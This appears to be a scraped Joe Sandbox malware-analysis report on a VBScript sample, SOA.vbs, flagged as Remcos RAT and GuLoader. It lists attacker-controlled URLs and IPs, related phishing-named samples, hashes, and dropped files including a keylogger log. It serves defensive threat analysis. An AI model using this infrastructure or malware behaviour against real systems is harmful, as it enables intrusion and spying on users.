                  http://103.237.86.powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://geoplugin.net/json.gpSwab.exe, 00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://login.yahoo.com/config/loginwab.exefalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://103.237.86.247/Teentpowershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.nirsoft.net/wab.exefalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1870759337.0000019E80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1714276170.00000000048D1000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://103.237Hpowershell.exe, 00000002.00000002.1870759337.0000019E81E28000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://103.237.86.247/Tepowershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1979668960.0000019E90070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1716933830.000000000593B000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000E.00000002.1714276170.0000000004A2B000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000E.00000002.1714276170.0000000004A2B000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://geoplugin.net/json.gpjwab.exe, 00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://go.micropowershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://geoplugin.net/json.gpiwab.exe, 00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    http://www.imvu.comwab.exefalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://contoso.com/Iconpowershell.exe, 0000000E.00000002.1716933830.000000000593B000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://103.237.86.2powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://github.com/Pester/Pesterpowershell.exe, 0000000E.00000002.1714276170.0000000004A2B000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://103.237.86.247/powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://103.237.86.24powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://103.237.86.247/Teepowershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://103.237.86.247/Teentsier.powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://103.237.86.247/Teentsier.lpkXRpowershell.exe, 0000000E.00000002.1714276170.0000000004A2B000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.google.com/accounts/serviceloginwab.exefalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://aka.ms/pscore68powershell.exe, 00000002.00000002.1870759337.0000019E80001000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://103.23powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://103.237.86.247/Teentsier.lpowershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.ebuddy.comwab.exefalse
                    • Avira URL Cloud: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    178.237.33.50
                    		geoplugin.netNetherlands
                    		8455ATOM86-ASATOM86NLfalse
                    103.237.86.247
                    		unknownunknown
                    		133587BGNR-AP2BainandCompanySGfalse
                    103.237.87.32
                    		unknownunknown
                    		133587BGNR-AP2BainandCompanySGtrue

                    General Information

                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1465863
                    Start date and time:2024-07-02 07:49:09 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 9m 9s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:28
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:SOA.vbs
                    Detection:MAL
                    Classification:mal100.phis.troj.spyw.expl.evad.winVBS@22/13@1/3
                    EGA Information:
                    • Successful, ratio: 66.7%
                    HCA Information:
                    • Successful, ratio: 97%
                    • Number of executed functions: 174
                    • Number of non-executed functions: 291
                    Cookbook Comments:
                    • Found application associated with file extension: .vbs

                    Warnings

                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
                    • Excluded IPs from analysis (whitelisted): 93.184.221.240
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, time.windows.com, wu-b-net.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target powershell.exe, PID 720 because it is empty
                    • Execution Graph export aborted for target powershell.exe, PID 7368 because it is empty
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Report size getting too big, too many NtCreateKey calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    01:50:02API Interceptor1x Sleep call for process: wscript.exe modified
                    01:50:04API Interceptor124x Sleep call for process: powershell.exe modified
                    03:37:28API Interceptor681402x Sleep call for process: wab.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    178.237.33.50SOA.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                    • geoplugin.net/json.gp
                    Vyuctovani_2024_07-1206812497#U00b7pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                    • geoplugin.net/json.gp
                    6b585caaf4299c406c45a3beb76a8624d159404e1aac48a292976119c6d9b72c_payload.exeGet hashmaliciousRemcosBrowse
                    • geoplugin.net/json.gp
                    HUED23EDE5UGRFQ.exeGet hashmaliciousRemcosBrowse
                    • geoplugin.net/json.gp
                    DHL Shipping Document Awb & BL.vbsGet hashmaliciousGuLoader, RemcosBrowse
                    • geoplugin.net/json.gp
                    tWitaq427K.exeGet hashmaliciousRemcos, AgentTeslaBrowse
                    • geoplugin.net/json.gp
                    TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbsGet hashmaliciousGuLoader, RemcosBrowse
                    • geoplugin.net/json.gp
                    Offer ZI-0428.docGet hashmaliciousRemcosBrowse
                    • geoplugin.net/json.gp
                    cKiTq7RRCn.exeGet hashmaliciousRemcosBrowse
                    • geoplugin.net/json.gp
                    INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                    • geoplugin.net/json.gp

                    Domains

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    geoplugin.netSOA.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                    • 178.237.33.50
                    Vyuctovani_2024_07-1206812497#U00b7pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                    • 178.237.33.50
                    6b585caaf4299c406c45a3beb76a8624d159404e1aac48a292976119c6d9b72c_payload.exeGet hashmaliciousRemcosBrowse
                    • 178.237.33.50
                    HUED23EDE5UGRFQ.exeGet hashmaliciousRemcosBrowse
                    • 178.237.33.50
                    DHL Shipping Document Awb & BL.vbsGet hashmaliciousGuLoader, RemcosBrowse
                    • 178.237.33.50
                    tWitaq427K.exeGet hashmaliciousRemcos, AgentTeslaBrowse
                    • 178.237.33.50
                    TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbsGet hashmaliciousGuLoader, RemcosBrowse
                    • 178.237.33.50
                    Offer ZI-0428.docGet hashmaliciousRemcosBrowse
                    • 178.237.33.50
                    cKiTq7RRCn.exeGet hashmaliciousRemcosBrowse
                    • 178.237.33.50
                    INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                    • 178.237.33.50

                    ASNs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    BGNR-AP2BainandCompanySGSOA.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                    • 103.237.86.247
                    Statement Of Account (2).vbsGet hashmaliciousRemcos, GuLoaderBrowse
                    • 103.237.86.247
                    Payment Copy.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                    • 103.237.86.247
                    YHZb2CeJdY.elfGet hashmaliciousMirai, OkiruBrowse
                    • 103.237.87.90
                    lVlJfRiCLE.elfGet hashmaliciousMirai, OkiruBrowse
                    • 103.237.87.90
                    TKX7tZs372.elfGet hashmaliciousMirai, OkiruBrowse
                    • 103.237.87.90
                    3B3W5byB4W.elfGet hashmaliciousMirai, OkiruBrowse
                    • 103.237.87.90
                    jkeqHGu4is.elfGet hashmaliciousMirai, OkiruBrowse
                    • 103.237.87.90
                    teb6nb8nmu.elfGet hashmaliciousMirai, OkiruBrowse
                    • 103.237.87.90
                    n7h2Ze4ezf.elfGet hashmaliciousMiraiBrowse
                    • 103.237.86.195
                    BGNR-AP2BainandCompanySGSOA.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                    • 103.237.86.247
                    Statement Of Account (2).vbsGet hashmaliciousRemcos, GuLoaderBrowse
                    • 103.237.86.247
                    Payment Copy.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                    • 103.237.86.247
                    YHZb2CeJdY.elfGet hashmaliciousMirai, OkiruBrowse
                    • 103.237.87.90
                    lVlJfRiCLE.elfGet hashmaliciousMirai, OkiruBrowse
                    • 103.237.87.90
                    TKX7tZs372.elfGet hashmaliciousMirai, OkiruBrowse
                    • 103.237.87.90
                    3B3W5byB4W.elfGet hashmaliciousMirai, OkiruBrowse
                    • 103.237.87.90
                    jkeqHGu4is.elfGet hashmaliciousMirai, OkiruBrowse
                    • 103.237.87.90
                    teb6nb8nmu.elfGet hashmaliciousMirai, OkiruBrowse
                    • 103.237.87.90
                    n7h2Ze4ezf.elfGet hashmaliciousMiraiBrowse
                    • 103.237.86.195
                    ATOM86-ASATOM86NLSOA.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                    • 178.237.33.50
                    Vyuctovani_2024_07-1206812497#U00b7pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                    • 178.237.33.50
                    6b585caaf4299c406c45a3beb76a8624d159404e1aac48a292976119c6d9b72c_payload.exeGet hashmaliciousRemcosBrowse
                    • 178.237.33.50
                    HUED23EDE5UGRFQ.exeGet hashmaliciousRemcosBrowse
                    • 178.237.33.50
                    DHL Shipping Document Awb & BL.vbsGet hashmaliciousGuLoader, RemcosBrowse
                    • 178.237.33.50
                    tWitaq427K.exeGet hashmaliciousRemcos, AgentTeslaBrowse
                    • 178.237.33.50
                    TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbsGet hashmaliciousGuLoader, RemcosBrowse
                    • 178.237.33.50
                    Offer ZI-0428.docGet hashmaliciousRemcosBrowse
                    • 178.237.33.50
                    cKiTq7RRCn.exeGet hashmaliciousRemcosBrowse
                    • 178.237.33.50
                    INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                    • 178.237.33.50

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\ProgramData\remcos\logs.dat

                    Download File
                    Process:C:\Program Files (x86)\Windows Mail\wab.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):144
                    Entropy (8bit):3.379519383183141
                    Encrypted:false
                    SSDEEP:3:rhlKlVH5lkQ55JWRal2Jl+7R0DAlBG45klovDl6v:6lVbR55YcIeeDAlOWAv
                    MD5:633B8C81F01D10690635234DB150AC83
                    SHA1:E3941559026D4AA0BC12C578AADEB375A2FD1AEB
                    SHA-256:5B5C466E099272EA43406DFD6178B83ACA533AD64379D557A3EBD1B662CB818B
                    SHA-512:16D90983FB3480B7846988411C4D26C410FE7EFDEBCDBC293143F063B1A091280FF5F365A5D9BC21C5C3EE3B94BFCADE0DFBED0E782BE015F67452BDEE5D756A
                    Malicious:true
                    Yara Hits:
                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                    Preview:....[.2.0.2.4./.0.7./.0.2. .0.3.:.3.6.:.5.6. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                    Download File
                    Process:C:\Windows\System32\wscript.exe
                    File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                    Category:dropped
                    Size (bytes):71954
                    Entropy (8bit):7.996617769952133
                    Encrypted:true
                    SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                    MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                    SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                    SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                    SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                    Malicious:false
                    Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                    Download File
                    Process:C:\Windows\System32\wscript.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):328
                    Entropy (8bit):3.137989037915285
                    Encrypted:false
                    SSDEEP:6:kK/asF9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:3kDnLNkPlE99SNxAhUe/3
                    MD5:77E54BC9F789026CEBD16779DE51FE48
                    SHA1:53B0C980EAC78B9D23CFE7D53E3DFB9BB4A14BDF
                    SHA-256:6AD7A9EAF66F2AF46BD1066956AE37093C466968CF0349E0CDA6FFE19A718ED2
                    SHA-512:6480071EB9FC6BB943E04566E06E19887716755CA9F45B1B97E7405364A795057F9BBCAF8F1537608F8EC1E0C28ED9248445C5DE577D7E0DFBB9ECB93F19C89D
                    Malicious:false
                    Preview:p...... ........Z.^.C...(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\json[1].json

                    Download File
                    Process:C:\Program Files (x86)\Windows Mail\wab.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):962
                    Entropy (8bit):5.013811273052389
                    Encrypted:false
                    SSDEEP:12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
                    MD5:18BC6D34FABB00C1E30D98E8DAEC814A
                    SHA1:D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
                    SHA-256:862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
                    SHA-512:8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
                    Malicious:false
                    Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                    Download File
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:modified
                    Size (bytes):11608
                    Entropy (8bit):4.8908305915084105
                    Encrypted:false
                    SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9R:9rib4Z1VoGIpN6KQkj2qkjh4iUxsT6YP
                    MD5:DD89E182EEC1B964E2EEFE5F8889DCD7
                    SHA1:326A3754A1334C32056811411E0C5C96F8BFBBEE
                    SHA-256:383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
                    SHA-512:B9AFE64D8558860B0CB8BC0FA676008E74F983C4845895E5444DD776A42B584ECE0BB1612D8F97EE631B064F08CF5B2C7622D58A3EF8EF89D199F2ACAEFA8B52
                    Malicious:false
                    Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                    Download File
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):64
                    Entropy (8bit):1.1940658735648508
                    Encrypted:false
                    SSDEEP:3:NlllulJnp/p:NllU
                    MD5:BC6DB77EB243BF62DC31267706650173
                    SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                    SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                    SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                    Malicious:false
                    Preview:@...e.................................X..............@..........

                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0wemkcmr.jmd.psm1

                    Download File
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):60
                    Entropy (8bit):4.038920595031593
                    Encrypted:false
                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                    Malicious:false
                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_554vvg2g.rtk.psm1

                    Download File
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):60
                    Entropy (8bit):4.038920595031593
                    Encrypted:false
                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                    Malicious:false
                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hhsbxivv.gj0.ps1

                    Download File
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):60
                    Entropy (8bit):4.038920595031593
                    Encrypted:false
                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                    Malicious:false
                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lzzt3u25.jkb.ps1

                    Download File
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):60
                    Entropy (8bit):4.038920595031593
                    Encrypted:false
                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                    Malicious:false
                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                    C:\Users\user\AppData\Local\Temp\bhvE06B.tmp

                    Download File
                    Process:C:\Program Files (x86)\Windows Mail\wab.exe
                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0x50401aeb, page size 32768, DirtyShutdown, Windows version 10.0
                    Category:dropped
                    Size (bytes):14680064
                    Entropy (8bit):0.97750649353834
                    Encrypted:false
                    SSDEEP:6144:IgMXQEUUMBPPpBPJmNjfiEWC7WswQpWK/qZCCkxpu514dCVZ3L9yqXx4SU8GxJHL:pn/cj5tND5ApBK4K
                    MD5:2079496977177C147204CACEF136B3DB
                    SHA1:F87E891347F846ACDDA1B8D85F2D47A3F0686F52
                    SHA-256:283FC2386D50CDA505FC8C7D208E54CBCD4907C8762975A79E530FA5836D6588
                    SHA-512:7DAC292A1BCEDABF19C35754B264ED750956B5B64351D8E727A8A98FE4E8EF71CE610D64EAC6108272FB8BD4AF40E6A5542727CA25134F8333950CD288882E70
                    Malicious:false
                    Preview:P@..... ................./..(...{........................&..... 6...{5.3$...|..h.(.........................:.I..(...{..............................................................................................P...........eJ......n........................................................................................................... .......93...{a..............................................................................................................................................................................................(...{..................................%6e.3$...|..................M...3$...|...........................#......h.(.....................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\knsxyccvpjetrdvkvhhergkhudayiyl

                    Download File
                    Process:C:\Program Files (x86)\Windows Mail\wab.exe
                    File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                    Category:modified
                    Size (bytes):2
                    Entropy (8bit):1.0
                    Encrypted:false
                    SSDEEP:3:Qn:Qn
                    MD5:F3B25701FE362EC84616A93A45CE9998
                    SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                    SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                    SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                    Malicious:false
                    Preview:..

                    C:\Users\user\AppData\Roaming\Appelmulighed.Bes

                    Download File
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:ASCII text, with very long lines (65536), with no line terminators
                    Category:dropped
                    Size (bytes):459660
                    Entropy (8bit):5.865092790583514
                    Encrypted:false
                    SSDEEP:6144:nSOolg4G+jEF3SPY/GPlbcSlJvB1egqBbKM1WJdDgZY9S7/jAv9i8bIT/UNAtmf:Sflg4LQF3SDRXz1erWM1E8XIiKAs
                    MD5:334F9B5F169FF2F2587CE0EFF7767B08
                    SHA1:30B561B8BDBBF0F0133897A22F5E603D3175CE23
                    SHA-256:F2265BC03EF563EDE08C5EAB67B27F147C1635CC85D17F41BF53C615BDF8D650
                    SHA-512:E0FC0E68BD85730F37009386B58A664A976C8CCC93D5CCD44CA32737A8EB92B530341C3674A1CCFD6E5FB340754FE98DDC3396021BB0D1822D23A77223408332
                    Malicious:false
